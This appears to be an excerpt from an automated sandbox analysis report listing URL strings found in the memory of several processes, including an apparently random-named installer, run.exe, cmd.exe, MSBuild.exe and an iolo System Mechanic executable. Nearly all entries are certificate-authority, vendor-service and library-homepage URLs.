Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2987654974.000001481AB50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2977434765.000001481A580000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E4E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3015127301.000001481B330000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2987654974.000001481AB50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2977434765.000001481A580000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2985173763.000001481AAA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E4E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3015127301.000001481B330000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2985173763.000001481AAA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2987654974.000001481AB50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2977434765.000001481A580000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E4E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3015127301.000001481B330000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2985173763.000001481AAA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://dejavu.sourceforge.net
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/License
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.00000000038DB000.00000004.00000020.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000000.1840725174.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://download.iolo.net
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014801DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense
Source: run.exe, run.exe, 00000002.00000002.1863624775.0000000000A6C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000000.1804255614.0000000000A6C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000000.2035551814.0000000000A6C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000002.2095606021.0000000000A6C000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.00000000038DB000.00000004.00000020.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000000.1840725174.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://google.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2987654974.000001481AB50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2977434765.000001481A580000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E4E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3015127301.000001481B330000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2987654974.000001481AB50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2977434765.000001481A580000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2985173763.000001481AAA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E4E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3015127301.000001481B330000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2987654974.000001481AB50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2977434765.000001481A580000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2985173763.000001481AAA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E4E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3015127301.000001481B330000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2985173763.000001481AAA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2987654974.000001481AB50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2977434765.000001481A580000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2985173763.000001481AAA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E4E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3015127301.000001481B330000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: MSBuild.exe, 0000000E.00000002.2928216488.0000000003261000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014802008000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.00000000038DB000.00000004.00000020.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000003.2124589441.00000000026FB000.00000004.00001000.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000000.1840725174.000000000041C000.00000020.00000001.01000000.0000000C.sdmp, u5g0.3.exe, 00000005.00000003.2124589441.0000000002700000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
Source: u5g0.3.exe, 00000005.00000003.2124589441.0000000002789000.00000004.00001000.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000003.2124589441.0000000002726000.00000004.00001000.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000003.2124589441.00000000027C4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3014494109.000001481B2E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://svc.iolo.com/__svc/sbv/Uninstall.ashx
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://www.codeplex.com/CompositeWPF
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2987654974.000001481AB50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://www.codeplex.com/prism
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2977808405.000001481A5C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModel
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2987654974.000001481AB50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2977434765.000001481A580000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2985173763.000001481AAA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E4E000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.3015127301.000001481B330000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: R0hb7jyBcv.exe, 00000000.00000003.1841736799.00000000038DB000.00000004.00000020.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000003.2124589441.0000000002782000.00000004.00001000.00020000.00000000.sdmp, u5g0.3.exe, 00000005.00000000.1840725174.000000000041C000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: run.exe, 00000002.00000002.1869479481.00000000041BC000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2129354420.000000000525F000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2098935400.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000F.00000002.2930470519.0000014801DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.iolo.com/products/byepass/welcome/?utm_source=bp&utm_medium=product&p=d59cc353-e8e4-4f42-
Source: u5g0.0.exe, u5g0.0.exe, 00000001.00000002.2101479423.000000006CB0D000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: u5g0.0.exe, 00000001.00000002.2100647420.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, u5g0.0.exe, 00000001.00000002.2087493033.000000001D230000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
